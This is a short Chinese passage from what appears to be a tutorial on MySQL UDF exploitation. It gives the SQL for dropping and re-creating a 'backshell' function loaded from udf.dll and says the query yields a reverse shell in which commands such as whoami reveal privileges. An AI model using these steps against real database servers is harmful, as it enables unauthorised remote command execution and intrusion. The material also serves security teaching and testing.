图3执行mysql查询
说明:
(1)如果已经存在ghost表和backshell函数,可以执行以下命令进行删除:
drop table ghost;
drop FUNCTION backshell;
(2)如果已经存在udf.dll,则可以跳过导出命令,执行:
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
3.查看反弹结果
如图4所示,显示通过连接mysql执行查询获取的终端反弹shell,在该shell下可以直接执行net user、whoami等命令查看当前权限。